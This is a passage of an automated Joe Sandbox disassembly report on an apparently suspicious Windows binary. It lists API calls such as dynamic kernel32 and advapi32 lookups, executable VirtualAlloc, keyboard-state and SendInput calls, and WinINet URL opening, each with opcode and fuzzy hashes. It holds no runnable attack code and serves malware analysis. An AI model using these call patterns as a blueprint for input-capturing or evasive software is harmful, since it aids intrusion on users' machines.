                                                                                                                  • API String ID: 2574300362-399901964
                                                                                                                  • Opcode ID: 934cf6eb447cdca8b7c43d478428d27b111a3b1a130012a533a5b86390943b8e
                                                                                                                  • Instruction ID: caf0b4289730ba226c010ad8bf76039e5c8aba0b3c9f155f8630a429c70d320f
                                                                                                                  • Opcode Fuzzy Hash: 934cf6eb447cdca8b7c43d478428d27b111a3b1a130012a533a5b86390943b8e
                                                                                                                  • Instruction Fuzzy Hash: DDD0A7744003229FD7215F60F80E62237D5AB14304B04D41EE689E1354D770C480CA30
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00D8E6D9,?,00D8E55B,00E0DC28,?,?), ref: 00D8E6F1
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00D8E703
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                                                  • API String ID: 2574300362-3024904723
                                                                                                                  • Opcode ID: f85ff71a15a2a4ec8131d02503912a64bb5d400e3722561e088b572b08189f36
                                                                                                                  • Instruction ID: 5a521468add5b646e375127fdf44c8ef70bdc95c247d92181093148ee639b053
                                                                                                                  • Opcode Fuzzy Hash: f85ff71a15a2a4ec8131d02503912a64bb5d400e3722561e088b572b08189f36
                                                                                                                  • Instruction Fuzzy Hash: 1FD0A934400322AFD7203F20FC4C6133BE9BB04308B05A42EE595E2260DBB0C880CB31
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00D8E69C,771B0AE0,00D8E5AC,00E0DC28,?,?), ref: 00D8E6B4
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D8E6C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                  • Opcode ID: b7855e3cc1fb7ddc56f2bac12a4cd13a0329b2f1ad1fcfb3325b86f3ab9c3f78
                                                                                                                  • Instruction ID: 5d9e6e2924e273e964885c6a232d25b9fa4a8a1e5e3e15e0a208f175d39b8b12
                                                                                                                  • Opcode Fuzzy Hash: b7855e3cc1fb7ddc56f2bac12a4cd13a0329b2f1ad1fcfb3325b86f3ab9c3f78
                                                                                                                  • Instruction Fuzzy Hash: FCD0A734404322AFD7217F30F80962237D5AB24305B05A81DE555E1260E770C480EB30
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00DCEBAF,?,00DCEAAC), ref: 00DCEBC7
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DCEBD9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                  • Opcode ID: 0b7b0e214827fccbe009f49d95ebf9de933894006e0419c67bfc27c28a4a257a
                                                                                                                  • Instruction ID: 33943c956dc903bd8f172fff62a7e1bae5b09ca25bda384206ff50b0ec65c474
                                                                                                                  • Opcode Fuzzy Hash: 0b7b0e214827fccbe009f49d95ebf9de933894006e0419c67bfc27c28a4a257a
                                                                                                                  • Instruction Fuzzy Hash: 95D05EB44047239BD7201F30A848B2137D6AB04309B15D41DE456E3250DA70DC80C621
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00DB1371,?,00DB1519), ref: 00DB13B4
                                                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00DB13C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                  • API String ID: 2574300362-1587604923
                                                                                                                  • Opcode ID: 02709436b1b57a583c2d79a5d5352437f52e07b4665f42b77ee9d00c48ed361f
                                                                                                                  • Instruction ID: 64b5ecf835e345fd6ddd9bfbb12011e1c018d91496c06c49c0ed8753eb521590
                                                                                                                  • Opcode Fuzzy Hash: 02709436b1b57a583c2d79a5d5352437f52e07b4665f42b77ee9d00c48ed361f
                                                                                                                  • Instruction Fuzzy Hash: 9ED0A734500322DFD7200F34F80865136EAAB40308F04941DE556E1760EE74C480CB30
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,00DB135F,?,00DB1440), ref: 00DB1389
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00DB139B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                  • API String ID: 2574300362-1071820185
                                                                                                                  • Opcode ID: 3c988fd9d480c7a2c30f16ec1cd30f4545df78c5223e01205ecaf13f8e4b101a
                                                                                                                  • Instruction ID: 71ff65536caca78559d18acae2d66793868b259e9a988164ea418ba8e70d3fc8
                                                                                                                  • Opcode Fuzzy Hash: 3c988fd9d480c7a2c30f16ec1cd30f4545df78c5223e01205ecaf13f8e4b101a
                                                                                                                  • Instruction Fuzzy Hash: 3ED0A938810322DFD7302F34F808B9636E9EF04308F088829E486E2750EAB8C884DB30
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00DD3AC2,?,00DD3CF7), ref: 00DD3ADA
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DD3AEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                  • Opcode ID: e27f17d94d768e661974ca96c36a07dc1d44df4c73bb6a35f7f7bca56c873da6
                                                                                                                  • Instruction ID: 8e418a0ca0db5acac2628d6c124d8b4eaff2f7a50df53aa3a54b859609d46c8b
                                                                                                                  • Opcode Fuzzy Hash: e27f17d94d768e661974ca96c36a07dc1d44df4c73bb6a35f7f7bca56c873da6
                                                                                                                  • Instruction Fuzzy Hash: BAD0A9B06043238FD7208F20F80D65237E9AB11308B04A42AF4E6E2790EFF0C880CA32
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00DC6AA6), ref: 00D7AB2D
                                                                                                                  • _wcscmp.LIBCMT ref: 00D7AB49
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper_wcscmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 820872866-0
                                                                                                                  • Opcode ID: bbc25f4f32d55fa889f2a93c8cfbbdff08fc8b33fe27b1f65266d467d8ea003c
                                                                                                                  • Instruction ID: c3c133b48f07aaba3033f293e02e4bedc1f281b4772c074458c7d94398cc5480
                                                                                                                  • Opcode Fuzzy Hash: bbc25f4f32d55fa889f2a93c8cfbbdff08fc8b33fe27b1f65266d467d8ea003c
                                                                                                                  • Instruction Fuzzy Hash: 8DA1F571700106DFDB15EF69E98166DB7B1FF84310F64816AEC5A97290EB30D871C762
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00DD0D85
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00DD0DC8
                                                                                                                    • Part of subcall function 00DD0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00DD0478
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00DD0FB2
                                                                                                                  • _memmove.LIBCMT ref: 00DD0FC2
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3659485706-0
                                                                                                                  • Opcode ID: db659ddbfccac8dd07f299f521155e2081b352d2735a1f157a830569b76e7f20
                                                                                                                  • Instruction ID: 465239a6071f90bfffcb157566b8caeb554206622d0524ffcc77b6207c0d3c3e
                                                                                                                  • Opcode Fuzzy Hash: db659ddbfccac8dd07f299f521155e2081b352d2735a1f157a830569b76e7f20
                                                                                                                  • Instruction Fuzzy Hash: 19B182756043009FC714DF28C480A6ABBE5EF89714F18896EF889DB351EB71ED45CB62
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00DCAF56
                                                                                                                  • CoUninitialize.COMBASE ref: 00DCAF61
                                                                                                                    • Part of subcall function 00DB1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DB10B8
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DCAF6C
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DCB23F
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 780911581-0
                                                                                                                  • Opcode ID: 50344322931724ca2026f535600da70d25d36f52ee5a3fb338472a1e2363d0b4
                                                                                                                  • Instruction ID: 15df3345684cb45b3ab4a77b3dcc1c35f6aa836c4c2fe5437b1ca156ef84baab
                                                                                                                  • Opcode Fuzzy Hash: 50344322931724ca2026f535600da70d25d36f52ee5a3fb338472a1e2363d0b4
                                                                                                                  • Instruction Fuzzy Hash: F9A114756047029FCB10DF14C896B2AB7E5EF89364F04844DF9999B3A1DB30ED44CBA6
                                                                                                                  APIs
                                                                                                                  • _memmove.LIBCMT ref: 00D7C419
                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00DB6653,?,?,00000000), ref: 00D7C495
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1325644223-0
                                                                                                                  • Opcode ID: 71ff3d6f9d3ea4f5d98f2c1986a35ea52b2f3df110539e5afe26d0ee6636b707
                                                                                                                  • Instruction ID: f71f27e8ce8c05d1436271059d967ed9a5773897c90646c732199f5d645f51fa
                                                                                                                  • Opcode Fuzzy Hash: 71ff3d6f9d3ea4f5d98f2c1986a35ea52b2f3df110539e5afe26d0ee6636b707
                                                                                                                  • Instruction Fuzzy Hash: 44A1AF70A04615EFDB10DF66C8847A9FBB0FF05300F14C599E859EA241E735E961DBB1
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3877424927-0
                                                                                                                  • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                  • Instruction ID: b8ee325aa49b1423d14681f2f85f77dadb0e04cc443cbef9fba2d989aea114b5
                                                                                                                  • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                  • Instruction Fuzzy Hash: 5D518230A003059BDF249FB98880EAE77A5EF41364F288729F875976D2D7B0DD529B70
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DDC354
                                                                                                                  • ScreenToClient.USER32(?,00000002), ref: 00DDC384
                                                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00DDC3EA
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3880355969-0
                                                                                                                  • Opcode ID: d69a223a689fc14b183ac2bdd261cc192639602b7f9a6dd598c31dd960f4d4ad
                                                                                                                  • Instruction ID: 1e36364d00d1afec84a16d0439050fd9f8bae2dfae20e5062aa8fa9a1d687241
                                                                                                                  • Opcode Fuzzy Hash: d69a223a689fc14b183ac2bdd261cc192639602b7f9a6dd598c31dd960f4d4ad
                                                                                                                  • Instruction Fuzzy Hash: D8514E71910209EFCF14DF68C880AAE7BA6FB45360F24915AF915DB391D770ED41CBA0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00DAD258
                                                                                                                  • __itow.LIBCMT ref: 00DAD292
                                                                                                                    • Part of subcall function 00DAD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00DAD549
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00DAD2FB
                                                                                                                  • __itow.LIBCMT ref: 00DAD350
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3379773720-0
                                                                                                                  • Opcode ID: 85ca24476ed452a549629e8364699a365f0cdb07beeedd4827696b41c4aa840f
                                                                                                                  • Instruction ID: 08be4235fbdb11b96365225737697d47c95ca02433c003cf4d3d18189d43be69
                                                                                                                  • Opcode Fuzzy Hash: 85ca24476ed452a549629e8364699a365f0cdb07beeedd4827696b41c4aa840f
                                                                                                                  • Instruction Fuzzy Hash: 43419475A00309AFDF11DF54C842BEE7BBAEF4A710F044019FA06A7291DBB09A45CB76
                                                                                                                  APIs
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DBEF32
                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00DBEF58
                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DBEF7D
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DBEFA9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3321077145-0
                                                                                                                  • Opcode ID: 2043466306e43a9753d54a582e8ba8ef75599b25f6882ca14e8df6e5bb14147e
                                                                                                                  • Instruction ID: 1ce6a7a6d98a11fbf694937d2971c9b70ff8c16e22ed02f7aa86a5e837a7201f
                                                                                                                  • Opcode Fuzzy Hash: 2043466306e43a9753d54a582e8ba8ef75599b25f6882ca14e8df6e5bb14147e
                                                                                                                  • Instruction Fuzzy Hash: AB414D35600611DFCB10EF15C548A99BBE6EF89324B19C098E84AAF362DB70FD40DBB1
                                                                                                                  APIs
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DDB3E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InvalidateRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 634782764-0
                                                                                                                  • Opcode ID: f89f815862627f2f230bb2f2cc1c31eb9368d1a167e8e4a1a5b7a08350915db3
                                                                                                                  • Instruction ID: 39309d6adbd6828a7363fb56531056ad11e9767544194186da6313ff18f8679e
                                                                                                                  • Opcode Fuzzy Hash: f89f815862627f2f230bb2f2cc1c31eb9368d1a167e8e4a1a5b7a08350915db3
                                                                                                                  • Instruction Fuzzy Hash: 68317E34640208EFEB24DE59C899FAC3B65EB0537CF5A8517FA91D63A2C730D940AB71
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00DDD617
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DDD68D
                                                                                                                  • PtInRect.USER32(?,?,00DDEB2C), ref: 00DDD69D
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00DDD70E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1352109105-0
                                                                                                                  • Opcode ID: 53f36d8d73d5b6d6f0a6e12cd97912841579865905f19a0644dc98d3c099c5cf
                                                                                                                  • Instruction ID: 9c440c746a911e000548aedf7399b5eed0c7cd997adae03d30cfbad8e02632b1
                                                                                                                  • Opcode Fuzzy Hash: 53f36d8d73d5b6d6f0a6e12cd97912841579865905f19a0644dc98d3c099c5cf
                                                                                                                  • Instruction Fuzzy Hash: 9E416C30600218EFCF15CF59D884BA97BF6FB45300F1881AAE419DB351D730E845CBA0
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00DB44EE
                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00DB450A
                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00DB456A
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00DB45C8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 432972143-0
                                                                                                                  • Opcode ID: a15a5234792f33884510bbdf04a321a27e1c8e957de5214bb179a726e3507abd
                                                                                                                  • Instruction ID: c5c702feb1b611c5add524cf216919036560f7ddbe0cd594f120774254e99054
                                                                                                                  • Opcode Fuzzy Hash: a15a5234792f33884510bbdf04a321a27e1c8e957de5214bb179a726e3507abd
                                                                                                                  • Instruction Fuzzy Hash: D731E3B1904658EBEF34CB649808BFE7BE69B45310F08415AF083922C2CB74CA44D772
                                                                                                                  APIs
                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DA4DE8
                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00DA4E16
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00DA4E44
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00DA4E7A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3058430110-0
                                                                                                                  • Opcode ID: c22c475f85e6b3b33c81775ac8aa62423e42ef988c3f00f96507f3040d0a2062
                                                                                                                  • Instruction ID: bfa3179dea296771f5e83c92a0dab788964ae78381cc0d53d11a01a2ae8b4aa5
                                                                                                                  • Opcode Fuzzy Hash: c22c475f85e6b3b33c81775ac8aa62423e42ef988c3f00f96507f3040d0a2062
                                                                                                                  • Instruction Fuzzy Hash: 8231A131600256AFDF219F74CC45BBA7BA6FF82310F198528F861871A1E7B0D951DBB0
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 00DD7AB6
                                                                                                                    • Part of subcall function 00DB69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB69E3
                                                                                                                    • Part of subcall function 00DB69C9: GetCurrentThreadId.KERNEL32 ref: 00DB69EA
                                                                                                                    • Part of subcall function 00DB69C9: AttachThreadInput.USER32(00000000,?,00DB8127), ref: 00DB69F1
                                                                                                                  • GetCaretPos.USER32(?), ref: 00DD7AC7
                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00DD7B00
                                                                                                                  • GetForegroundWindow.USER32 ref: 00DD7B06
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2759813231-0
                                                                                                                  • Opcode ID: c4fcc9a5762f17fc974716ce28af60c243b37c58f2eda675dbfb4d5a91739cf5
                                                                                                                  • Instruction ID: b73480766a984a3bcf6a8d333e443b327b4eb9897feabebfc05ceb02ae61e758
                                                                                                                  • Opcode Fuzzy Hash: c4fcc9a5762f17fc974716ce28af60c243b37c58f2eda675dbfb4d5a91739cf5
                                                                                                                  • Instruction Fuzzy Hash: 8231ED71D00108AFCB00EFA5D8859EFBBF9EF58314B10806AE916E7211EA359E058BB0
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DC49B7
                                                                                                                    • Part of subcall function 00DC4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DC4A60
                                                                                                                    • Part of subcall function 00DC4A41: InternetCloseHandle.WININET(00000000), ref: 00DC4AFD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1463438336-0
                                                                                                                  • Opcode ID: c107ebc385c710802332cc42bd71d39fac8e605073d533414b885d117b071a35
